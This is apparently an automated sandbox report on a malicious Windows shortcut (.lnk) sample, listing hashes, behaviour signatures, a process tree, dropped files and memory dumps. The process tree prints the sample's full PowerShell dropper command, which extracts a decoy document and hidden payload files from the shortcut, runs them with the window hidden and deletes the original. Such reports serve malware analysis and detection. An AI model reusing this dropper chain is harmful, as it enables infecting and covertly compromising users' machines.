Analysis

  • max time kernel
    144s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-04-2024 05:24

General

  • Target

    b02329000ae4f8f4238db366d8fe394867dcad8222d02d9a76e82a376c6b1405.lnk

  • Size

    50.4MB

  • MD5

    82f881a33eafee75fb1344432f76faf6

  • SHA1

    05f4fc5f51d2dc9c55e3b948f43297b2d1fda1d4

  • SHA256

    b02329000ae4f8f4238db366d8fe394867dcad8222d02d9a76e82a376c6b1405

  • SHA512

    93d61ca4d38383371ca5295ea74abd6f96eeb69a02af8eb67e78685a79493698e01f345333336b252082d300af31f0d8b21fbaff35fede3cf9c386ad9070f2f4

  • SSDEEP

    196608:xbtqwY5Dj6Y7GoxdWC0H3M3AXqIGPaJOmlvuoeL7g2BQ4m6BXhG2wf:G3/ao3WC0Hc3AaIGk/Ru7RDm6BX42wf

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\b02329000ae4f8f4238db366d8fe394867dcad8222d02d9a76e82a376c6b1405.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4584
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0325E0BC} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000108E, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x0087F800;$lnkFile.Read($pdfFile, 0, 0x0087F800);$pdfPath = $lnkPath.replace('.lnk','.doc');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0088088E,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x00959C90,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0095A239,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3076
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
        3⤵
          PID:2900
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0325E0BC} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000108E, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x0087F800;$lnkFile.Read($pdfFile, 0, 0x0087F800);$pdfPath = $lnkPath.replace('.lnk','.doc');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0088088E,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x00959C90,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0095A239,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
          3⤵
          • Deletes itself
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1616
          • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
            "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b02329000ae4f8f4238db366d8fe394867dcad8222d02d9a76e82a376c6b1405.doc" /o ""
            4⤵
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious use of SetWindowsHookEx
            PID:4068
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\price.bat""
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2284
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'para.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4980
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ucsdhcxe\ucsdhcxe.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4348
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES94BE.tmp" "c:\Users\Admin\AppData\Local\Temp\ucsdhcxe\CSC260690EB9CC54C57BEDFED2F184874FD.TMP"
                  7⤵
                    PID:2632
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cqxyz5hm\cqxyz5hm.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3344
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES95B8.tmp" "c:\Users\Admin\AppData\Local\Temp\cqxyz5hm\CSC8CA04DE1463541468AE129FCEB357577.TMP"
                    7⤵
                      PID:1496
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1wduz5b3\1wduz5b3.cmdline"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4564
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9700.tmp" "c:\Users\Admin\AppData\Local\Temp\1wduz5b3\CSC2D960D8E694948CDA39B4C335577AE7.TMP"
                      7⤵
                        PID:3220
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qwrd00zc\qwrd00zc.cmdline"
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1476
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9887.tmp" "c:\Users\Admin\AppData\Local\Temp\qwrd00zc\CSC3BFDE336DD1C47C5A24C451EE947976.TMP"
                        7⤵
                          PID:3256
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 2440
                        6⤵
                        • Program crash
                        PID:4584
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4980 -ip 4980
              1⤵
                PID:3548

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                Filesize

                2KB

                MD5

                0774a05ce5ee4c1af7097353c9296c62

                SHA1

                658ff96b111c21c39d7ad5f510fb72f9762114bb

                SHA256

                d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4

                SHA512

                104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                19KB

                MD5

                d60951276ed4a8a1cdeb368273a689ba

                SHA1

                ad2224404df3728cd24313f7d9b155647e680789

                SHA256

                f24e67e0f220519d9482bb2cf913d470c31d6ed6e989bce5c6c4ad8c4bded3e8

                SHA512

                019aa1554ec62e6014cffb8e5f64114eb036f27a82b2866f9d8c4ac5f93552fa06d1ab9510af9ba18f5525e3a8a240ee2935fd17f4b831917a77cd46a93a70ac

              • C:\Users\Admin\AppData\Local\Temp\1wduz5b3\1wduz5b3.dll

                Filesize

                3KB

                MD5

                1814bbd539bf982fbebda6d89007205c

                SHA1

                d23d9f715dec1cfb65b4cb816c26843fe47edfef

                SHA256

                079318211d5f34fafe49315dfa94f65f6764e2f00d6ed879a28dcb39fd0dc256

                SHA512

                464780b714df9f6af77269dfb044eeb64d4d03166872460f58a0f40f0e604d2b9f4f749c368b25b5afa400b1a3f5217dae97b823ff7612d631a42350fae30f45

              • C:\Users\Admin\AppData\Local\Temp\RES94BE.tmp

                Filesize

                1KB

                MD5

                db2a3949622f2ab88a35179d6dc7ad91

                SHA1

                5997641d0442fe2f5699a10c7bf9f4376a01d628

                SHA256

                944070dcf365e3d321c359ad1aa77525498a43e3256570a0bbfa95310e25d130

                SHA512

                d66440ce6adbbfb5f4f0bc9ebc1fcbdb3c3559c61cb110964d8488bd3e64b52acbfec49503f7062de44a0c434ac82628c56f95d2b5961272b33ba69ba3606a40

              • C:\Users\Admin\AppData\Local\Temp\RES95B8.tmp

                Filesize

                1KB

                MD5

                7fcc6b109549f1bd26c794522ce034f4

                SHA1

                132f978619d482a0b5af3995b8e77d1c5c6de983

                SHA256

                642d338ee5aeac7a7370dc8d4714339b2cd606045b1fd26a99135b514e69c553

                SHA512

                c8b88007ad7e62258a09963ec02e7cdb70c1d1c3ecc32fc76d8b70f6636a8d94e8cc92edfc49204371da87114bf10fe67b0ccfa182bc9f6a613522debbfa4518

              • C:\Users\Admin\AppData\Local\Temp\RES9700.tmp

                Filesize

                1KB

                MD5

                e520583250ea7d192bf1feb5d4f59f75

                SHA1

                fdd266e8f0891c3bcf036951cd6344a14e59f243

                SHA256

                09ffda3ef4c91e625b36e62377f9bf21057e917de1fdb2cdf0a3fc4b069b0c88

                SHA512

                9ba0b6ce1b051032604fb2d323babc79fd2f112d79d28ad0a9a0069be2a785c2dfd1458cc8f944259cc08ff26d0ff93f89a99bf981fbe2f9f6b3ca9710c819fa

              • C:\Users\Admin\AppData\Local\Temp\RES9887.tmp

                Filesize

                1KB

                MD5

                0d6983f7c9e568bd1b2f54855fe79733

                SHA1

                bd0e99cf229b5bf9fc95bb3354cb84dbe0a99669

                SHA256

                8d8e4d29a88a801174fd4c5bffb08f658097f2ce092d10d4cbab50671c5e3ea0

                SHA512

                7319db857153c593a7d17f2e7f3d3301ce878f45754dbd023a6f1d7424ec41ea4a462a8240ff532c71133862e31a567f9a73f76eaff094b726415d1037f400d6

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s0h2laej.hyj.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\b02329000ae4f8f4238db366d8fe394867dcad8222d02d9a76e82a376c6b1405.doc

                Filesize

                8.5MB

                MD5

                0689668e800b7a680f4532380eccfb33

                SHA1

                85aea59dec1ab52eabda6f9ca4633f95d8a07b03

                SHA256

                9646372af573fb90a7f3665386629cc3b08ee44fb5d294f479c931ad7300bb31

                SHA512

                36f2e50d9ff50d6a68c95514dc1934e94ee4419a7a71c49987dff3358bb80e523c45e51c1ef3dbff4838d43789559b5fd05e3aa0c8c93612867a3fa45dd327c2

              • C:\Users\Admin\AppData\Local\Temp\cqxyz5hm\cqxyz5hm.dll

                Filesize

                3KB

                MD5

                cd20fb8154e0b25e9f4ad37078ea5d54

                SHA1

                196f89bc09762ddcae5aa44025ccd26f390b57b6

                SHA256

                4ce67545f5a34105f19f79ab8857767fae5deed2ab51262bb75ee45967125bab

                SHA512

                ad650676d064aac797e4e24583388928d8b6ec9d452085dcf966910c698e7e36b5bba64751aa84a60339e9ea54138c9adcd74bc25bd83179587d392ab0030db8

              • C:\Users\Admin\AppData\Local\Temp\para.dat

                Filesize

                1KB

                MD5

                655f58dcd7cd8bd996076ad4b492ae00

                SHA1

                7d69d7926de1ad560f0d002bd768eb182177cca4

                SHA256

                4e9d83e270910fa2610a2bdb0fef2bc2f5a2c257ce8c9eb5ba3f73eb051f5cf7

                SHA512

                87575186d8674c4be4f736db9b008b5ef975a21b60d38a635ad874dd399b5263fc6cba94e6010681c6262241df3b1f3074411c815121141414727c326d70e204

              • C:\Users\Admin\AppData\Local\Temp\price.bat

                Filesize

                311B

                MD5

                f5787b3e60fad2b255ebc54d0ce747dc

                SHA1

                830705c5417f11c730cd8bbde4a2a709671cc11d

                SHA256

                a43f7b080c30816997fc15589f904365917f30ae15441b22fbda11aec2ddf1c0

                SHA512

                1e702414e37c90da42457295653e4df5a64208476206e001d8c23edfe5b8e7e5145672b5e0abf5bc4667e4e059735066db4c0a6a04cca259eb96e7755ce6cd8f

              • C:\Users\Admin\AppData\Local\Temp\qwrd00zc\qwrd00zc.dll

                Filesize

                3KB

                MD5

                26225955319b2f1e6fbdc2deff83a8df

                SHA1

                bad4fcbca6d3e05d1d359943d09bcdc1859badb7

                SHA256

                e9d8c0f9938d40cce2489d77d7113d8f6eb136909b6b633290600c31a4ba2905

                SHA512

                51e33716551bb13cb81bd0322f34bc5e9b0345f85c22e3c807d6b9284b760abf1a2785d2424d36025399f6425c683dae67c24a054d9b8691cb85296436ffb2cf

              • C:\Users\Admin\AppData\Local\Temp\ucsdhcxe\ucsdhcxe.dll

                Filesize

                3KB

                MD5

                28912f9bd7cc14b87049d34a2ee9b01b

                SHA1

                f4c07dec184a6338e2f4154045a3e8fb051c47b8

                SHA256

                0fba2b3834b30eddd816a0cb346400259e5875534b4c00fab67bf235c672270b

                SHA512

                9d7ac703d7a4d09c27f9f419e0c1bfd0b85441c52c8df4882a70625541eb7b46c1446b47676b0d9ec1423618d2b512c9fc18a77f523625cf44eb5531afd3fede

              • C:\Users\Public\panic.dat

                Filesize

                869KB

                MD5

                a043b3a2af9db6173e3a39b5c501a9bd

                SHA1

                4250f3855e53ccf755f8a05b1998f55dfa4b2c0e

                SHA256

                dc6ca2e9ce800245a65715647bb1614c35632f270d1879e796472e786cdfc0fc

                SHA512

                a667c8521589e96ba57b2ae6e429f43a352c36968edb4cadf57500a1a5e39511b3e7109bb2c372b9567c8e50777cfc71f0cb8150f2782a6a8ac9d90222f802f5

              • \??\c:\Users\Admin\AppData\Local\Temp\1wduz5b3\1wduz5b3.0.cs

                Filesize

                286B

                MD5

                b23df8158ffd79f95b9bddd18738270b

                SHA1

                79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

                SHA256

                856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

                SHA512

                e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

              • \??\c:\Users\Admin\AppData\Local\Temp\1wduz5b3\1wduz5b3.cmdline

                Filesize

                369B

                MD5

                73a9502ff6a67a1e3d3afe5b96b831d9

                SHA1

                eb14d677abf87b311a4cfd942b92dea967d944a0

                SHA256

                fc73bf980b0ca4af8ee2361c85c0e1ddda1ccc53472981de92a407317bb516f2

                SHA512

                74235d9f871e3b3d7987fd64e621c132ab8e83e60fae94334df9dbc3e10bfed7fc92c91ac52b1f55b4ff816448353ab520cee749873b3c61921a793564f805fc

              • \??\c:\Users\Admin\AppData\Local\Temp\1wduz5b3\CSC2D960D8E694948CDA39B4C335577AE7.TMP

                Filesize

                652B

                MD5

                cf1bfb147e8ec3aaca6633aa42517810

                SHA1

                5366ec314a7200af8790252b4bad138faf3c6040

                SHA256

                609f578ebe3ec2887505a7d6bcc9a02f8a9f3bad1a5060e94bc361e6f6e2a072

                SHA512

                85b006963131e8784dabf1805578cb91f94e43b0dfcf2104d0f621ccec18048a2b4c365e558f6b2029eecfa769fd967d462ee22ce187bd32b1f12b12517a1fb9

              • \??\c:\Users\Admin\AppData\Local\Temp\cqxyz5hm\CSC8CA04DE1463541468AE129FCEB357577.TMP

                Filesize

                652B

                MD5

                0ec91abe824b7f98833dc96066cecf6d

                SHA1

                2f176d2135a941eaea8271184611c61ebcb146a7

                SHA256

                7838f88bc4728b0b7b930344f534f7c9b77cf7bc07825218196fca224e13c1b2

                SHA512

                74e54681f4c074852a1adc93644c1a9dae3691bda6dc90e5ea5f29080a6dba7c8baa20c76b67a47556f1d42de1423bee56383e642f25b410be19bac9d2ee3702

              • \??\c:\Users\Admin\AppData\Local\Temp\cqxyz5hm\cqxyz5hm.0.cs

                Filesize

                272B

                MD5

                4de985ae7f625fc7a2ff3ace5a46e3c6

                SHA1

                935986466ba0b620860f36bf08f08721827771cb

                SHA256

                53d5aecb149a00bc9c4fac5feb8e5feddf5c83986c12d5fef1c3ddd104b09004

                SHA512

                067916a8d16d322d72901baf3a369be43c99780961ccd306c171bf7ded06e3a13cf69c7fa0cd26c7fa181d87fc0e870f86d274098854a56346ca9272c0b99393

              • \??\c:\Users\Admin\AppData\Local\Temp\cqxyz5hm\cqxyz5hm.cmdline

                Filesize

                369B

                MD5

                17f2a28683741ca1c2d5bcbd79fc6720

                SHA1

                3322c1848a4a7c5585f4d8dc3135bd450b478284

                SHA256

                0a6df18b572de67b187fdd81f5c12053ebffa7b8087992c394e41f47b3ac9aca

                SHA512

                07abf719f7f32364ca9eb87fc1db1003bc6a6845da0b8acdcee4b69bc0d8bd23d843b3f0aaa5ef93e413790494a5e673cb4e1448bad9879bbac42c0890bec61a

              • \??\c:\Users\Admin\AppData\Local\Temp\qwrd00zc\CSC3BFDE336DD1C47C5A24C451EE947976.TMP

                Filesize

                652B

                MD5

                35f1a978b3add85fe440dc508873a233

                SHA1

                ca2316ff9ce924b47fb5ebea7d4e53dc49d33efa

                SHA256

                65fd62ce4ef31fb6c8a79cb34cb60c1710120f5c8fb7485c0ebb1d15e201232f

                SHA512

                7cbf738256c123a98a495960f5a2fc1eebae783d2ac78f503db0c5b1d62b9a92c837e32bb92f1745e0436ebd9eaa4a9547a17c55ee3c6874c0e773c5b9e5976a

              • \??\c:\Users\Admin\AppData\Local\Temp\qwrd00zc\qwrd00zc.0.cs

                Filesize

                259B

                MD5

                560e1b883a997afcfa3b73d8a5cddbc1

                SHA1

                2905f3f296ac3c7d6a020fb61f0819dbea2f1569

                SHA256

                e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea

                SHA512

                041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635

              • \??\c:\Users\Admin\AppData\Local\Temp\qwrd00zc\qwrd00zc.cmdline

                Filesize

                369B

                MD5

                487d2df0f25cb941e6db83d774cb848e

                SHA1

                68a1bd2c0bc84017ae47e846f831b57f6174b2e5

                SHA256

                1f622911cdae0aa79214fa063cf2714e3f7c151a0018190a3bc9b05c8bdf314e

                SHA512

                d297838829f88549d97d092ab9f2962317b6c0238e03336453ac94234a496646efeeec4980b5464c2239b63cbca358e635940b4696b3bd41dec1366ec6dde71b

              • \??\c:\Users\Admin\AppData\Local\Temp\ucsdhcxe\CSC260690EB9CC54C57BEDFED2F184874FD.TMP

                Filesize

                652B

                MD5

                64c13ff96b4017120f6660255a227c6a

                SHA1

                ff5815a7ea7dc2cc9516a1d1baa4458a9f8507cc

                SHA256

                ca748eaa95e2e607a5625360443ff154069e4a29484632cc5bf472d44695d864

                SHA512

                6bd6dcde07c229ef0a5300c2b54aec3e987a4f3325bdb27fd2a015136eb2de7f1537cc3f30888b12f3788ae718fed990b04da9539efa481b796c5a9cd9f084d5

              • \??\c:\Users\Admin\AppData\Local\Temp\ucsdhcxe\ucsdhcxe.0.cs

                Filesize

                249B

                MD5

                69ecfeb3e9a8fb7890d114ec056ffd6d

                SHA1

                cba5334d2ffe24c60ef793a3f6a7f08067a913db

                SHA256

                0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

                SHA512

                be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

              • \??\c:\Users\Admin\AppData\Local\Temp\ucsdhcxe\ucsdhcxe.cmdline

                Filesize

                369B

                MD5

                f06bcd712ec9dd1535aec67d98a94240

                SHA1

                73d4c981c6cfe20c96b2f858680f09640b70c559

                SHA256

                c88b8772ab6a559e7e04e3afd33049398bd0ab0a75a3472512af30469d317ba3

                SHA512

                81052806eee65dbc3f1333a49049ee6f3fc8a1229fb8db2c89f5584b325b837b1ba1715194b18ee67ff54d3f9ec7f26a26ca95ebba5e0b5561a2b971485ad12a

              • memory/1616-18-0x0000000006020000-0x000000000606C000-memory.dmp

                Filesize

                304KB

              • memory/1616-1-0x00000000749A0000-0x0000000075150000-memory.dmp

                Filesize

                7.7MB

              • memory/1616-23-0x0000000008280000-0x00000000088FA000-memory.dmp

                Filesize

                6.5MB

              • memory/1616-22-0x0000000007650000-0x0000000007BF4000-memory.dmp

                Filesize

                5.6MB

              • memory/1616-21-0x0000000006530000-0x0000000006552000-memory.dmp

                Filesize

                136KB

              • memory/1616-20-0x00000000064E0000-0x00000000064FA000-memory.dmp

                Filesize

                104KB

              • memory/1616-19-0x0000000006FB0000-0x0000000007046000-memory.dmp

                Filesize

                600KB

              • memory/1616-17-0x0000000005FE0000-0x0000000005FFE000-memory.dmp

                Filesize

                120KB

              • memory/1616-16-0x00000000059E0000-0x0000000005D34000-memory.dmp

                Filesize

                3.3MB

              • memory/1616-6-0x0000000005970000-0x00000000059D6000-memory.dmp

                Filesize

                408KB

              • memory/1616-58-0x00000000749A0000-0x0000000075150000-memory.dmp

                Filesize

                7.7MB

              • memory/1616-5-0x0000000005900000-0x0000000005966000-memory.dmp

                Filesize

                408KB

              • memory/1616-4-0x0000000005120000-0x0000000005142000-memory.dmp

                Filesize

                136KB

              • memory/1616-3-0x0000000005160000-0x0000000005788000-memory.dmp

                Filesize

                6.2MB

              • memory/1616-2-0x0000000004B20000-0x0000000004B30000-memory.dmp

                Filesize

                64KB

              • memory/1616-0-0x00000000026D0000-0x0000000002706000-memory.dmp

                Filesize

                216KB

              • memory/4068-36-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4068-40-0x00007FFB0D310000-0x00007FFB0D320000-memory.dmp

                Filesize

                64KB

              • memory/4068-182-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4068-181-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4068-180-0x00007FFB0D310000-0x00007FFB0D320000-memory.dmp

                Filesize

                64KB

              • memory/4068-179-0x00007FFB0D310000-0x00007FFB0D320000-memory.dmp

                Filesize

                64KB

              • memory/4068-55-0x00007FFB0B2B0000-0x00007FFB0B2C0000-memory.dmp

                Filesize

                64KB

              • memory/4068-53-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4068-54-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4068-178-0x00007FFB0D310000-0x00007FFB0D320000-memory.dmp

                Filesize

                64KB

              • memory/4068-51-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4068-50-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4068-48-0x00007FFB0B2B0000-0x00007FFB0B2C0000-memory.dmp

                Filesize

                64KB

              • memory/4068-49-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4068-177-0x00007FFB0D310000-0x00007FFB0D320000-memory.dmp

                Filesize

                64KB

              • memory/4068-45-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4068-43-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4068-42-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4068-41-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4068-154-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4068-153-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4068-38-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4068-37-0x00007FFB0D310000-0x00007FFB0D320000-memory.dmp

                Filesize

                64KB

              • memory/4068-32-0x00007FFB0D310000-0x00007FFB0D320000-memory.dmp

                Filesize

                64KB

              • memory/4068-35-0x00007FFB0D310000-0x00007FFB0D320000-memory.dmp

                Filesize

                64KB

              • memory/4068-33-0x00007FFB0D310000-0x00007FFB0D320000-memory.dmp

                Filesize

                64KB

              • memory/4068-152-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4068-34-0x00007FFB4D290000-0x00007FFB4D485000-memory.dmp

                Filesize

                2.0MB

              • memory/4980-151-0x0000000074000000-0x00000000747B0000-memory.dmp

                Filesize

                7.7MB

              • memory/4980-148-0x00000000065D0000-0x00000000065D8000-memory.dmp

                Filesize

                32KB

              • memory/4980-134-0x00000000065C0000-0x00000000065C8000-memory.dmp

                Filesize

                32KB

              • memory/4980-80-0x00000000069F0000-0x0000000006A3C000-memory.dmp

                Filesize

                304KB

              • memory/4980-120-0x00000000065B0000-0x00000000065B8000-memory.dmp

                Filesize

                32KB

